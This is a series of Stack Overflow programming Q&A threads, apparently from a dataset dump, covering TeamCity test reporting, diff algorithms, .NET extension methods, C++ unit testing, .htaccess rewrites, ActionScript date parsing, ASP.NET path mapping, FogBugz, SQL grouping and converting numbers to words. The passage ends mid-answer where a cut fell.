<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:apply-templates/>
</xsl:template>
<xsl:template match="assemblies/assembly">
##teamcity[testSuiteStarted name='<xsl:value-of select="@name" />']
<xsl:apply-templates select="//run" />
##teamcity[testSuiteFinished name='<xsl:value-of select="@name" />']
</xsl:template>
<xsl:template match="run">
<xsl:choose>
<xsl:when test="@result='ignore' or @result='skip'">
##teamcity[testIgnored name='<xsl:value-of select="@name" />' message='Test Ignored']
</xsl:when>
<xsl:otherwise>
##teamcity[testStarted name='<xsl:value-of select="@name" />']
</xsl:otherwise>
</xsl:choose>
<xsl:if test="@result='failure'">
##teamcity[testFailed name='<xsl:value-of select="@name" />' message='<xsl:value-of select="child::node()/message"/>' details='<xsl:value-of select="normalize-space(child::node()/stack-trace)"/>']
</xsl:if>
<xsl:if test="@result!='ignore' and @result!='skip'">
##teamcity[testFinished name='<xsl:value-of select="@name" />']
</xsl:if>
</xsl:template>
</xsl:stylesheet>
A: Here's what I came up with
How can I merge in the test report?
First you'll need to get mbunit to generate both an XML and HTML report. The Command line arguments look like this
/rt:Xml /rt:Html /rnf:mbunit /rf:..\reports
this will generate the reports into a dir called reports and the file will be called mbunit.xml and mbunit.html
next we want to add these files as artifacts on the build
build\reports\* => Reports
the last step is to tell teamcity to add it as a tab for the build
find the .BuildServer\config\main-config.xml and add this line
(on windows this is in c:\Documents and Settings\, on linux it was in the /root dir)
<report-tab title="Tests" basePath="Reports" startPage="mbunit.html" />
How can I display "Tests failed: 1 (1 new), passed: 3049" for the build?
TeamCity looks for a file called teamcity-info.xml where you can stick messages in to be displayed. The Actual test count is actually just plain text. I think you can just add the file as an artifact but I've also got it in the root dir of the build.
in NAnt you'll want to use this command to do an XSLT on the MBUnit XML Report
<style style="includes\teamcity-info.xsl" in="reports\mbunit.xml" out="..\teamcity-info.xml" />
the actual xsl looks like this.
(Note: that the { and } are reserved in xsl so we have to use params)
<?xml version="1.0" encoding="ISO-8859-1"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:param name="cbl" select="'{'"/>
<xsl:param name="cbr" select="'}'"/>
<xsl:template match="/">
<xsl:for-each select="report-result/counter">
<build number="1.0.{concat($cbl,'build.number',$cbr)}">
<xsl:if test="@failure-count > 0">
<statusInfo status="FAILURE">
<text action="append"> Tests failed: <xsl:value-of select="@failure-count"/>, passed: <xsl:value-of select="@success-count"/></text>
</statusInfo>
</xsl:if>
<xsl:if test="@failure-count = 0">
<statusInfo status="SUCCESS">
<text action="append"> Tests passed: <xsl:value-of select="@success-count"/></text>
</statusInfo>
</xsl:if>
</build>
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
This will give you a file that looks like this
<build number="1.0.{build.number}">
<statusInfo status="FAILURE">
<text action="append">Tests failed: 16, passed: 88</text>
</statusInfo>
</build>
A: TeamCity Sidebar Gadget for Windows Vista, Windows 7
http://teamcity-gadget.com
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3143",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: 'Best' Diff Algorithm I need to implement a Diff algorithm in VB.NET to find the changes between two different versions of a piece of text. I've had a scout around the web and have found a couple of different algorithms.
Does anybody here know of a 'best' algorithm that I could implement?
A: Well I've used the c# version on codeproject and its really good for what I wanted...
http://www.codeproject.com/KB/recipes/diffengine.aspx
You can probably get this translated into VB.net via an online converter if you can't do it yourself...
A: I like An O(ND) Difference Algorithm and Its Variations by Eugene Myers. I believe it's the algorithm that was used in GNU diff. For a good background see Wikipedia.
This is quite theoretical and you might wish to find source code, but I'm not aware of any in VB.
A: I don't know for sure if it's the best diff algorithms but you might want to check out those links that talks about SOCT4 and SOCT6
http://dev.libresource.org/home/doc/so6-user-manual/concepts
and also:
http://www.loria.fr/~molli/pmwiki/uploads/Main/so6group03.pdf
http://www.loria.fr/~molli/pmwiki/uploads/Main/diffalgo.pdf
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3144",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: What are the best practices for using Extension Methods in .Net? I have seen these being used every which way, and have been accused of using them the wrong way (though in that case, I was using them that way to demonstrate a point).
So, what do you think are the best practices for employing Extension Methods?
Should development teams create a library of extension methods and deploy them across various projects?
Should there be a collection of common extension methods in the form of an open source project?
Update: have decided to create an organization wide extension methods library
A: The upcoming release of the Framework Design Guidelines, 2nd Edition will have some guidance for implementing extension methods, but in general:
You should only define extension methods "where they make semantic sense" and are providing helper functionality relevant to every implementation.
You also should avoid extending System.Object as not all .NET languages will be able to call the extension method as an extension. (VB.NET for instance would need to call it as a regular static method on the static extension class.)
Don't define an extension method in the same namespace as the extended type unless you're extending an interface.
Don't define an extension method with the same signature as a "real" method since it will never be called.
A: you might want to take a look at http://www.codeplex.com/nxl and http://www.codeplex.com/umbrella which are both extension method libraries. I personally haven't had a look at the source code but I'm sure the guys there would be able to give you some good pointers.
A: I've been including my extension methods in with my Core libraries in the Utils class because people who are working with my framework are likely to find the methods useful, but for mass deployment where the end developer might have a choice of extension method libraries, I would advise putting all of your extensions into their own namespace, even their own project file, so that people can choose to add a reference or a using statement or simply where required, like so:
Core.Extensions.Base64Encode(str);
My Utils class is my bestest friend in the whole world, it was before extension methods came along and they have only helped to strengthen our relationship. The biggest rule I would go by is to give people choice over what extension framework they are using where possible.
A: The Objective-C language has had "Categories" since the early 1990s; these are essentially the same thing as .NET Extension Methods. When looking for best practices you might want to see what rules of thumb Objective-C (Cocoa & NeXT) developers have come up with around them.
Brent Simmons (the author of the NetNewsWire RSS reader for Mac OS X and iPhone) just posted today about his new style rules for the use of categories and there's been a bit of discussion in the Cocoa community around that post.
A: I think that it depends on what purpose the Extension methods serve.
*
*Extension methods that relate to specific business needs of a project (whether they are connected to basic data types or custom objects) should not be included in a library that would be distributed across multiple projects.
*Extension methods that relate to basic data types (int, string, etc) or generics that have a wider application could be packaged and distributed across projects.
Take care not to globally include Extension methods that have little application, as they just clog up intellisense and can lead to confusion and/or misuse.
A: When I first found out about Extensions I really overused and abused them.
For the most part I have started to get away from using any Extension Methods for a number of reasons.
Some of the reasons I stopped using them are noted in Scott's blog link above, such as "Think twice before extending types you don't own". If you have no control over the source for the types you are extending, you may encounter issues/collisions in the future if the source type has some additions/changes, such as moving your project to a newer .NET version. If the newer .NET version includes a method on the type of the same name as your extension, someone is going to get clobbered.
The main reason why I stopped using Extension Methods is that you can't quickly tell from reading the code where the source of the method is and who "owns" it.
When just reading through the code you can't tell whether the method is an extension or just a standard NET API method on the type.
The intellisense menu can get really messy really fast.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3147",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "43"
} |
Q: How to set up unit testing for Visual Studio C++ I'm having trouble figuring out how to get the testing framework set up and usable in Visual Studio 2008 for C++ presumably with the built-in unit testing suite.
Any links or tutorials would be appreciated.
A: Here is the approach I use to test the IIS URL Rewrite module at Microsoft (it is command-line based, but should work for VS too):
*
*Make sure your header files are consumable by moving source code to cpp files and using forward declaration if needed.
*Compile your code to test as library (.lib)
*Create your UnitTest project as C++ with CLR support.
*Include your header files.
*Include your .lib files.
*Add a reference to Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll
*Use a really small class for declaring your unit test and jump from managed to C++/Native code like this (may have typos):
Here is an example:
// Example
#include "stdafx.h"
#include "mstest.h"
// Following code is native code.
#pragma unmanaged
void AddTwoNumbersTest() {
// Arrange
Adder yourNativeObject;
int expected = 3;
int actual;
// Act
actual = yourNativeObject.Add(1, 2);
// Assert
Assert::AreEqual(expected, actual, L"1 + 2 != 3");
}
// Following code is C++/CLI (Managed)
#pragma managed
using namespace Microsoft::VisualStudio::TestTools::UnitTesting;
[TestClass]
public ref class TestShim {
public:
[TestMethod]
void AddTwoNumbersTest() {
// Just jump to C++ native code (above)
::AddTwoNumbersTest();
}
};
With this approach, people don't have to learn too much C++/CLI stuff, all the real test will be done in C++ native and the TestShim class will be used to 'publish' the test to MSTest.exe (or make it visible).
For adding new tests you just declare a new [TestMethod] void NewTest(){::NewTest();} method and a new void NewTest() native function. No macros, no tricks, straighforward.
Now, the heade file is optionally, but it can be used to expose the Assert class' methods with C++ native signatures (e.g. wchar_t* instead of Stirng^), so it can you can keep it close to C++ and far from C++/CLI:
Here is an example:
// Example
#pragma once
#pragma managed(push, on)
using namespace System;
class Assert {
public:
static void AreEqual(int expected, int actual) {
Microsoft::VisualStudio::TestTools::UnitTesting::Assert::AreEqual(expected, actual);
}
static void AreEqual(int expected, int actual, PCWSTR pszMessage) {
Microsoft::VisualStudio::TestTools::UnitTesting::Assert::AreEqual(expected, actual, gcnew String(pszMe
ssage));
}
template<typename T>
static void AreEqual(T expected, T actual) {
Microsoft::VisualStudio::TestTools::UnitTesting::Assert::AreEqual(expected, actual);
}
// Etcetera, other overloads...
}
#pragma managed(pop)
HTH
A: Personally, I prefer WinUnit since it doesn't require me to write anything except for my tests (I build a .dll as the test, not an exe). I just build a project, and point WinUnit.exe to my test output directory and it runs everything it finds. You can download the WinUnit project here. (MSDN now requires you to download the entire issue, not the article. WinUnit is included within.)
A: This page may help, it reviews quite a few C++ unit test frameworks:
*
*CppUnit
*Boost.Test
*CppUnitLite
*NanoCppUnit
*Unit++
*CxxTest
Check out CPPUnitLite or CPPUnitLite2.
CPPUnitLite was created by Michael Feathers, who originally ported Java's JUnit to C++ as CPPUnit (CPPUnit tries mimic the development model of JUnit - but C++ lacks Java's features [e.g. reflection] to make it easy to use).
CPPUnitLite attempts to make a true C++-style testing framework, not a Java one ported to C++. (I'm paraphrasing from Feather's Working Effectively with Legacy Code book). CPPUnitLite2 seems to be another rewrite, with more features and bug fixes.
I also just stumbled across UnitTest++ which includes stuff from CPPUnitLite2 and some other framework.
Microsoft has released WinUnit.
Also checkout Catch or Doctest
A: The framework included with VS9 is .NET, but you can write tests in C++/CLI, so as long as you're comfortable learning some .NET isms, you should be able to test most any C++ code.
boost.test
and googletest
look to be fairly similar, but adapted for slightly different uses. Both of these have a binary component, so you'll need an extra project in your solution to compile and run the tests.
The framework we use is CxxTest, which is much lighter; it's headers only, and uses a Perl (!) script to scrape test suite information from your headers (suites inherit from CxxTest::Base, all your test methods' names start with "test"). Obviously, this requires that you get Perl from one source or another, which adds overhead to your build environment setup.
A: There is a way to test unmanaged C++ using the built in testing framework within Visual Studio 2008. If you create a C++ Test Project, using C++/CLI, you can then make calls to an unmanaged DLL. You will have to switch the Common Language Runtime support to /clr from /clr:safe if you want to test code that was written in unmanaged C++.
I have step by step details on my blog here: http://msujaws.wordpress.com/2009/05/06/unit-testing-mfc-with-mstest/
A: I use UnitTest++.
In the years since I made this post the source has moved from SourceForge to github. Also the example tutorial is now more agnostic - doesn't go into any configuration or project set up at all.
I doubt it will still work for Visual Studio 6 as the project files are now created via CMake. If you still need the older version support you can get the last available version under the SourceForge branch.
A: The tools that have been mentioned here are all command-line tools. If you look for a more integrated solution, have a look at cfix studio, which is a Visual Studio AddIn for C/C++ unit testing. It is quite similar to TestDriven.Net, but for (unmanaged) C/C++ rather than .NET.
A: I've used CppUnit with VS2005 and Eclipse. The wiki is very thorough (especially if you are familiar with JUnit).
A: I'm not 100% sure about VS2008, but I know that the Unit Testing framework that microsoft shipped in VS2005 as part of their Team Suite was only for .NET, not C++
I've used CppUnit also and it was alright. Much the same as NUnit/JUnit/so on.
If you've used boost, they also have a unit testing library
The guys behind boost have some serious coding chops, so I'd say their framework should be pretty good, but it might not be the most user friendly :-)
A: The unit tester for Visual Studio 2008 is only for .NET code as far as I know.
I used CppUnit on Visual Studio 2005 and found it to be pretty good.
As far as I remember, the setup was relatively painless. Just make sure that in your testing projects the linker (Linker → Input → Additional Dependencies) includes cppunitd.lib.
Then, #include <cppunit/extensions/HelperMacros.h> in your header.
You can then follow the steps in http://cppunit.sourceforge.net/doc/1.11.6/cppunit_cookbook.html to get your test class working.
A: I like the CxxTest as well for the same reasons. It's a header file only so no linking required. You aren't stuck with Perl as there is a Python runner as well. I will be reviewing the google library soon. The Boost stuff pulls in too much other baggage.
A: I was suffering to implement unit testing for an unmanaged C++ application in a Windows environment with Visual Studio. So I managed to overcome and wrote a post as a step-by-step guidance to unmanaged C++ application unit testing. I hope it may help you.
Unit test for unmanaged C++ in Visual Studio
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3150",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "94"
} |
Q: .htaccess directives to *not* redirect certain URLs In an application that heavily relies on .htaccess RewriteRules for its PrettyURLs (CakePHP in my case), how do I correctly set up directives to exclude certain directories from this rewriting? That is:
/appRoot/.htaccess
app/
static/
By default every request to /appRoot/* is being rewritten to be picked up by app/webroot/index.php, where it's being analysed and corresponding controller actions are being invoked. This is done by these directives in .htaccess:
RewriteBase /appRoot
RewriteRule ^$ app/webroot/ [L]
RewriteRule (.*) app/webroot/$1 [L]
I now want to exclude a few directories like static/ from this rewriting. I tried with this before the Cake RewriteRules:
RewriteCond $1 ^(static|otherDir).*$ [NC]
RewriteRule (.*) - [L]
It works in so far that requests are no longer rewritten, but now all requests are being skipped, even legitimate Cake requests which should not match ^(static|otherDir).*$.
I tried several variations of these rules but can't get it to work the way I want.
A: And the correct answer iiiiis...
RewriteRule ^(a|bunch|of|old|directories).* - [NC,L]
# all other requests will be forwarded to Cake
RewriteRule ^$ app/webroot/ [L]
RewriteRule (.*) app/webroot/$1 [L]
I still don't get why the index.php file in the root directory was called initially even with these directives in place. It is now located in
/appRoot/app/views/pages/home.ctp
and handled through Cake as well. With this in place now, I suppose this would have worked as well (slightly altered version of Mike's suggestion, untested):
RewriteCond $1 !^(a|bunch|of|old|directories).*$ [NC]
RewriteRule ^(.*)$ app/webroot/$1 [L]
A: Remove the [L] from the previous rules:
RewriteBase /appRoot
RewriteRule ^$ app/webroot/
RewriteRule (.*) app/webroot/$1
[L] means "Stop the rewriting process here and don't apply any more rewriting rules."
A: Could you not apply the condition to the following rules, but with negation, as in (with some variation thereof, I'm not too good at remembering .htaccess rules, so the flags might be wrong):
RewriteCond $1 !^(static|otherDir).*$ [NC]
RewriteRule ^$ app/webroot/ [L]
RewriteCond $1 !^(static|otherDir).*$ [NC]
RewriteRule ^$ app/webroot/$1 [L]
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3157",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Actionscript 3 - Fastest way to parse yyyy-mm-dd hh:mm:ss to a Date object? I have been trying to find a really fast way to parse yyyy-mm-dd [hh:mm:ss] into a Date object. Here are the 3 ways I have tried doing it and the times it takes each method to parse 50,000 date time strings.
Does anyone know any faster ways of doing this or tips to speed up the methods?
castMethod1 takes 3673 ms
castMethod2 takes 3812 ms
castMethod3 takes 3931 ms
Code:
private function castMethod1(dateString:String):Date {
if ( dateString == null ) {
return null;
}
var year:int = int(dateString.substr(0,4));
var month:int = int(dateString.substr(5,2))-1;
var day:int = int(dateString.substr(8,2));
if ( year == 0 && month == 0 && day == 0 ) {
return null;
}
if ( dateString.length == 10 ) {
return new Date(year, month, day);
}
var hour:int = int(dateString.substr(11,2));
var minute:int = int(dateString.substr(14,2));
var second:int = int(dateString.substr(17,2));
return new Date(year, month, day, hour, minute, second);
}
-
private function castMethod2(dateString:String):Date {
if ( dateString == null ) {
return null;
}
if ( dateString.indexOf("0000-00-00") != -1 ) {
return null;
}
dateString = dateString.split("-").join("/");
return new Date(Date.parse( dateString ));
}
-
private function castMethod3(dateString:String):Date {
if ( dateString == null ) {
return null;
}
var mainParts:Array = dateString.split(" ");
var dateParts:Array = mainParts[0].split("-");
if ( Number(dateParts[0])+Number(dateParts[1])+Number(dateParts[2]) == 0 ) {
return null;
}
return new Date( Date.parse( dateParts.join("/")+(mainParts[1]?" "+mainParts[1]:" ") ) );
}
No, Date.parse will not handle dashes by default. And I need to return null for date time strings like "0000-00-00".
A: This was the fastest I could come up with after some fiddling:
private function castMethod4(dateString:String):Date {
if ( dateString == null )
return null;
if ( dateString.length != 10 && dateString.length != 19)
return null;
dateString = dateString.replace("-", "/");
dateString = dateString.replace("-", "/");
return new Date(Date.parse( dateString ));
}
I get 50k iterations in about 470ms for castMethod2() on my computer and 300 ms for my version (that's the same amount of work done in 63% of the time). I'd definitely say both are "Good enough" unless you're parsing silly amounts of dates.
A: I'm guessing Date.Parse() doesn't work?
A: I've been using the following snipplet to parse UTC date strings:
private function parseUTCDate( str : String ) : Date {
var matches : Array = str.match(/(\d\d\d\d)-(\d\d)-(\d\d) (\d\d):(\d\d):(\d\d)Z/);
var d : Date = new Date();
d.setUTCFullYear(int(matches[1]), int(matches[2]) - 1, int(matches[3]));
d.setUTCHours(int(matches[4]), int(matches[5]), int(matches[6]), 0);
return d;
}
Just remove the time part and it should work fine for your needs:
private function parseDate( str : String ) : Date {
var matches : Array = str.match(/(\d\d\d\d)-(\d\d)-(\d\d)/);
var d : Date = new Date();
d.setUTCFullYear(int(matches[1]), int(matches[2]) - 1, int(matches[3]));
return d;
}
No idea about the speed, I haven't been worried about that in my applications. 50K iterations in significantly less than a second on my machine.
A: Well then method 2 seems the best way:
private function castMethod2(dateString:String):Date {
if ( dateString == null ) {
return null;
}
if ( dateString.indexOf("0000-00-00") != -1 ) {
return null;
}
dateString = dateString.split("-").join("/");
return new Date(Date.parse( dateString ));
}
A: Because Date.parse() does not accept all possible formats, we can preformat the passed dateString value using DateFormatter with formatString that Data.parse() can understand, e.g
// English formatter
var stringValue = "2010.10.06"
var dateCommonFormatter : DateFormatter = new DateFormatter();
dateCommonFormatter.formatString = "YYYY/MM/DD";
var formattedStringValue : String = dateCommonFormatter.format(stringValue);
var dateFromString : Date = new Date(Date.parse(formattedStringValue));
A: var strDate:String = "2013-01-24 01:02:40";
function dateParser(s:String):Date{
var regexp:RegExp = /(\d{4})\-(\d{1,2})\-(\d{1,2}) (\d{2})\:(\d{2})\:(\d{2})/;
var _result:Object = regexp.exec(s);
return new Date(
parseInt(_result[1]),
parseInt(_result[2])-1,
parseInt(_result[3]),
parseInt(_result[4]),
parseInt(_result[5]),
parseInt(_result[6])
);
}
var myDate:Date = dateParser(strDate);
A: Here is my implementation. Give this a try.
public static function dateToUtcTime(date:Date):String {
var tmp:Array = new Array();
var char:String;
var output:String = '';
// create format YYMMDDhhmmssZ
// ensure 2 digits are used for each format entry, so 0x00 suffuxed at each byte
tmp.push(date.secondsUTC);
tmp.push(date.minutesUTC);
tmp.push(date.hoursUTC);
tmp.push(date.getUTCDate());
tmp.push(date.getUTCMonth() + 1); // months 0-11
tmp.push(date.getUTCFullYear() % 100);
for(var i:int=0; i < 6/* 7 items pushed*/; ++i) {
char = String(tmp.pop());
trace("char: " + char);
if(char.length < 2)
output += "0";
output += char;
}
output += 'Z';
return output;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3163",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "24"
} |
Q: Absolute path back to web-relative path If I have managed to locate and verify the existence of a file using Server.MapPath and I now want to send the user directly to that file, what is the fastest way to convert that absolute path back into a relative web path?
A: Perhaps this might work:
String RelativePath = AbsolutePath.Replace(Request.ServerVariables["APPL_PHYSICAL_PATH"], String.Empty);
I'm using c# but could be adapted to vb.
A: I like the idea from Canoas. Unfortunately I had not "HttpContext.Current.Request" available (BundleConfig.cs).
I changed the methode like this:
public static string RelativePath(this HttpServerUtility srv, string path)
{
return path.Replace(HttpContext.Current.Server.MapPath("~/"), "~/").Replace(@"\", "/");
}
A: Wouldn't it be nice to have Server.RelativePath(path)?
well, you just need to extend it ;-)
public static class ExtensionMethods
{
public static string RelativePath(this HttpServerUtility srv, string path, HttpRequest context)
{
return path.Replace(context.ServerVariables["APPL_PHYSICAL_PATH"], "~/").Replace(@"\", "/");
}
}
With this you can simply call
Server.RelativePath(path, Request);
A: If you used Server.MapPath, then you should already have the relative web path. According to the MSDN documentation, this method takes one variable, path, which is the virtual path of the Web server. So if you were able to call the method, you should already have the relative web path immediately accessible.
A: I know this is old but I needed to account for virtual directories (per @Costo's comment). This seems to help:
static string RelativeFromAbsolutePath(string path)
{
if(HttpContext.Current != null)
{
var request = HttpContext.Current.Request;
var applicationPath = request.PhysicalApplicationPath;
var virtualDir = request.ApplicationPath;
virtualDir = virtualDir == "/" ? virtualDir : (virtualDir + "/");
return path.Replace(applicationPath, virtualDir).Replace(@"\", "/");
}
throw new InvalidOperationException("We can only map an absolute back to a relative path if an HttpContext is available.");
}
A: For asp.net core i wrote helper class to get pathes in both directions.
public class FilePathHelper
{
private readonly IHostingEnvironment _env;
public FilePathHelper(IHostingEnvironment env)
{
_env = env;
}
public string GetVirtualPath(string physicalPath)
{
if (physicalPath == null) throw new ArgumentException("physicalPath is null");
if (!File.Exists(physicalPath)) throw new FileNotFoundException(physicalPath + " doesn't exists");
var lastWord = _env.WebRootPath.Split("\\").Last();
int relativePathIndex = physicalPath.IndexOf(lastWord) + lastWord.Length;
var relativePath = physicalPath.Substring(relativePathIndex);
return $"/{ relativePath.TrimStart('\\').Replace('\\', '/')}";
}
public string GetPhysicalPath(string relativepath)
{
if (relativepath == null) throw new ArgumentException("relativepath is null");
var fileInfo = _env.WebRootFileProvider.GetFileInfo(relativepath);
if (fileInfo.Exists) return fileInfo.PhysicalPath;
else throw new FileNotFoundException("file doesn't exists");
}
from Controller or service inject FilePathHelper and use:
var physicalPath = _fp.GetPhysicalPath("/img/banners/abro.png");
and versa
var virtualPath = _fp.GetVirtualPath(physicalPath);
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3164",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "66"
} |
Q: Anyone soloing using fogbugz? Is there anyone working solo and using fogbugz out there? I'm interested in personal experience/overhead versus paper.
I am involved in several projects and get pretty hammered with lots of details to keep track of... Any experience welcome.
(Yes I know Mr. Joel is on the stackoverflow team... I still want good answers :)
A: I use it as well and quite frankly wouldn't want to work without it.
I've always had some kind of issue tracker available for the projects I work on and thus am quite used to updating it. With FB6 the process is now even better.
Since FB also integrates with Subversion, the source control tool I use for my projects, the process is really good and I have two-way links between the two systems now. I can click on a case number in the Subversion logs and go to the case in FB, or see the revisions bound to a case inside FB.
A: I think it's great that Joel et al. let people use FogBugs hosted for free on their own. It's a great business strategy, because the users become fans (it is great software after all), and then they recommend it to their businesses or customers.
A: I use it, especially since the hosted Version of FugBugz is free for up to 2 people. I found it a lot nicer than paper as I'm working on multiple projects, and my paper tends to get rather messy once you start making annotations or if you want to re-organize and shuffle tasks around, mark them as complete only to see that they are not complete after all...
Plus, the Visual Studio integration is really neat, something paper just cannot compete with. Also, if you lay the project to rest for 6 months and come back, all your tasks and notes are still there, whereas with paper you may need to search all the old documents and notes again, if you did not discard it.
But that is just the point of view from someone who is not really good at staying organized :-) If you are a really tidy and organized person, paper may work better for you than it does for me.
Bonus suggestion: Run Fogbugz on a second PC (or a small Laptop like the eeePC) so that you always have it at your fingertips. The main problem with Task tracking programs - be it FogBugz, Outlook, Excel or just notepad - is that they take up screen space, and my two monitors are usually full with Visual Studio, e-Mail, Web Browsers, some Notepads etc.
A: Go to http://www.fogbugz.com/ then at the bottom under "Try It", sign up.
under Settings => Your FogBugz Hosted Account, it should either already say "Payment Information: Using Student and Startup Edition." or there should be some option/link to turn on the Student and Startup Edition.
And yes, it's not only for Students and Startups, I asked their support :-)
Disclaimer: I'm not affiliated with FogCreek and Joel did not just deposit money in my account.
A: When I was working for myself doing my consulting business I signed up for a hosted account and honestly I couldn't have done without it.
What I liked most about it was it took 30 seconds to sign up for an account and I was then able to integrate source control using sourcegear vault (which is an excellent source control product and free for single developers) set up projects, clients, releases and versions and monitor my progress constantly.
One thing that totally blew me away was that I ended up completely abandoning outlook for all work related correspondence. I could manage all my client interactions from within fogbugz and it all just worked amazingly well.
In terms of overhead, one of the nice things you could do was turn anything into a case. Anything that came up in your mind while you were coding, you simply created a new email, sent it to fogbugz and it was instantly added as an item for review later.
I would strongly recommend you get yourself one of the hosted accounts and give it a whirl
A: In addition to the benefits already mentioned, another nice feature of using FogBugz is BugzScout, which you can use to report errors from your app and log them into FogBugz automatically. If you're a one person team, chances are there are some bugs in your code you've never seen during your own testing, so it's nice to have those bugs found "in the wild" automatically reported and logged for you.
A: Yea FogBugz is great for process-light, quick and easy task management. It seems especially well suited for soloing, where you don't need or want a lot of complexity in that area.
By the way, if you want to keep track of what you're doing at the computer all day, check out TimeSprite, which integrates with FogBugz. It's a Windows app that logs your active window and then categorizes your activity based on the window title / activity type mappings you define as you go. (You can also just tell it what you're working on.) And if you're a FogBugz user, you can associate your work with a FogBugz case, and it will upload your time intervals for that case. This makes accurate recording of elapsed time pretty painless and about as accurate as you can get, which in turn improves FogBugz predictive powers in its evidence-based scheduling. Also, when soloing, I find that such specific logging of my time keeps me on task, in the way a meandering manager otherwise might. (I'm not affiliated with TimeSprite in any way.)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3180",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "35"
} |
Q: SQL query, count and group by If I have data like this:
Key
Name
1
Dan
2
Tom
3
Jon
4
Tom
5
Sam
6
Dan
What is the SQL query to bring back the records where Name is repeated 2 or more times?
So the result I would want is
Tom
Dan
A: Couldn't be simpler...
Select Name, Count(Name) As Count
From Table
Group By Name
Having Count(Name) > 1
Order By Count(Name) Desc
This could also be extended to delete duplicates:
Delete From Table
Where Key In (
Select Max(Key)
From Table
Group By Name
Having Count(Name) > 1
)
A: select name from table group by name having count(name) > 1
A: This could also be accomplished by joining the table with itself,
SELECT DISTINCT t1.name
FROM tbl t1
INNER JOIN tbl t2
ON t1.name = t2.name
WHERE t1.key != t2.key;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3196",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "26"
} |
Q: Convert integers to written numbers Is there an efficient method of converting an integer into the written numbers, for example:
string Written = IntegerToWritten(21);
would return "Twenty One".
Is there any way of doing this that doesn't involve a massive look-up table?
A: This should work reasonably well:
public static class HumanFriendlyInteger
{
static string[] ones = new string[] { "", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine" };
static string[] teens = new string[] { "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen" };
static string[] tens = new string[] { "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety" };
static string[] thousandsGroups = { "", " Thousand", " Million", " Billion" };
private static string FriendlyInteger(int n, string leftDigits, int thousands)
{
if (n == 0)
{
return leftDigits;
}
string friendlyInt = leftDigits;
if (friendlyInt.Length > 0)
{
friendlyInt += " ";
}
if (n < 10)
{
friendlyInt += ones[n];
}
else if (n < 20)
{
friendlyInt += teens[n - 10];
}
else if (n < 100)
{
friendlyInt += FriendlyInteger(n % 10, tens[n / 10 - 2], 0);
}
else if (n < 1000)
{
friendlyInt += FriendlyInteger(n % 100, (ones[n / 100] + " Hundred"), 0);
}
else
{
friendlyInt += FriendlyInteger(n % 1000, FriendlyInteger(n / 1000, "", thousands+1), 0);
if (n % 1000 == 0)
{
return friendlyInt;
}
}
return friendlyInt + thousandsGroups[thousands];
}
public static string IntegerToWritten(int n)
{
if (n == 0)
{
return "Zero";
}
else if (n < 0)
{
return "Negative " + IntegerToWritten(-n);
}
return FriendlyInteger(n, "", 0);
}
}
(Edited to fix a bug w/ million, billion, etc.)
A: why massive lookup table?
string GetWrittenInteger(int n)
{
string[] a = new string[] {"One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine" }
string[] b = new string[] { "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen" }
string[] c = new string[] {"Twenty", "Thirty", "Forty", "Sixty", "Seventy", "Eighty", "Ninety"};
string[] d = new string[] {"Hundred", "Thousand", "Million"}
string s = n.ToString();
for (int i = 0; i < s.Length; i++)
{
// logic (too lazy but you get the idea)
}
}
A: I use this handy library called Humanizer.
https://github.com/Humanizr/Humanizer
It supports several cultures and converts not only numbers to words but also date and it's very simple to use.
Here's how I use it:
int someNumber = 543;
var culture = System.Globalization.CultureInfo("en-US");
var result = someNumber.ToWords(culture); // 543 -> five hundred forty-three
And voilá!
A: using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace tryingstartfror4digits
{
class Program
{
static void Main(string[] args)
{
Program pg = new Program();
Console.WriteLine("Enter ur number");
int num = Convert.ToInt32(Console.ReadLine());
if (num <= 19)
{
string g = pg.first(num);
Console.WriteLine("The number is " + g);
}
else if ((num >= 20) && (num <= 99))
{
if (num % 10 == 0)
{
string g = pg.second(num / 10);
Console.WriteLine("The number is " + g);
}
else
{
string g = pg.second(num / 10) + pg.first(num % 10);
Console.WriteLine("The number is " + g);
}
}
else if ((num >= 100) && (num <= 999))
{
int k = num % 100;
string g = pg.first(num / 100) +pg.third(0) + pg.second(k / 10)+pg.first(k%10);
Console.WriteLine("The number is " + g);
}
else if ((num >= 1000) && (num <= 19999))
{
int h = num % 1000;
int k = h % 100;
string g = pg.first(num / 1000) + "Thousand " + pg.first(h/ 100) + pg.third(k) + pg.second(k / 10) + pg.first(k % 10);
Console.WriteLine("The number is " + g);
}
Console.ReadLine();
}
public string first(int num)
{
string name;
if (num == 0)
{
name = " ";
}
else
{
